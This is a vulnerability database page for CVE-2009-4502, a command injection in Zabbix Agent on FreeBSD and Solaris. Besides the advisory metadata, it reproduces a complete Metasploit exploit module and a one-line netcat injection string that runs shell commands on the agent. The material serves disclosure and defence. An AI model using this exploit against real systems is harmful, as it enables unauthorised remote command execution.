CVE-2009-4502 : Detail

CVE-2009-4502

A01-Broken Access Control
65.19%V3
Network
2009-12-31
18h00 +00:00
2024-09-17
00h05 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The NET_TCP_LISTEN function in net.c in Zabbix Agent before 1.6.7, when running on FreeBSD or Solaris, allows remote attackers to bypass the EnableRemoteCommands setting and execute arbitrary commands via shell metacharacters in the argument to net.tcp.listen. NOTE: this attack is limited to attacks from trusted IP addresses.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16918

Publication date : 2010-07-02 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: zabbix_agent_exec.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Zabbix Agent net.tcp.listen Command Injection', 'Description' => %q{ This module exploits a metacharacter injection vulnerability in the FreeBSD and Solaris versions of the Zabbix agent. This flaw can only be exploited if the attacker can hijack the IP address of an authorized server (as defined in the configuration file). }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9669 $', 'References' => [ [ 'CVE', '2009-4502' ], [ 'OSVDB', '60956' ], [ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'], ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'BadChars' => "'", 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 10 2009')) register_options( [ Opt::RPORT(10050) ], self.class) end def exploit connect rnd_port = rand(1024) + 1 buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n" print_status("Sending net.tcp.listen() request to the zabbix agent...") sock.put(buf) res = nil begin res = sock.get_once(-1, 5) rescue ::EOFError end if ! res print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.") disconnect return end if (res =~ /ZBX_NOTSUPPORTED/) print_status("The zabbix agent is not running a vulnerable version or operating system.") disconnect return end if(res !~ /ZBXD/) print_status("The zabbix agent returned an unknown response.") disconnect return end print_status("The zabbix agent should have executed our command.") disconnect end end
Exploit Database EDB-ID : 10431

Publication date : 2009-12-13 23h00 +00:00
Author : Nicob
EDB Verified : Yes

Zabbix Agent : Bypass of EnableRemoteCommands=0 From: Nicob <nicob () nicob net> Date: Sun, 13 Dec 2009 16:28:30 +0100 From Wikipedia : "Zabbix is a network management system application [...] designed to monitor and track the status of various network services, servers, and other network hardware." [Zabbix Agent : Bypass of EnableRemoteCommands=0] Impacted software : Zabbix Agent (FreeBSD and Solaris only) Zabbix reference : https://support.zabbix.com/browse/ZBX-1032 Patched version : 1.6.7 Faulty source code : function NET_TCP_LISTEN() in libs/zbxsysinfo/(freebsd|solaris)/net.c Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050 Limitation : attacker must come from (or spoof) a trusted IP address Changelog entry : fixed security vulnerability in processing of net.tcp.listen under FreeBSD and Solaris agents

Products Mentioned

Configuraton 0

Zabbix>>Zabbix >> Version To (including) 1.6.6

Zabbix>>Zabbix >> Version 1.1.2

Zabbix>>Zabbix >> Version 1.1.3

Zabbix>>Zabbix >> Version 1.1.4

Zabbix>>Zabbix >> Version 1.1.5

Zabbix>>Zabbix >> Version 1.4.2

Zabbix>>Zabbix >> Version 1.4.3

Zabbix>>Zabbix >> Version 1.4.4

Zabbix>>Zabbix >> Version 1.4.6

Freebsd>>Freebsd >> Version *

Sun>>Solaris >> Version *

References

http://www.securityfocus.com/archive/1/508439
Tags : mailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/37740
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/3514
Tags : vdb-entry, x_refsource_VUPEN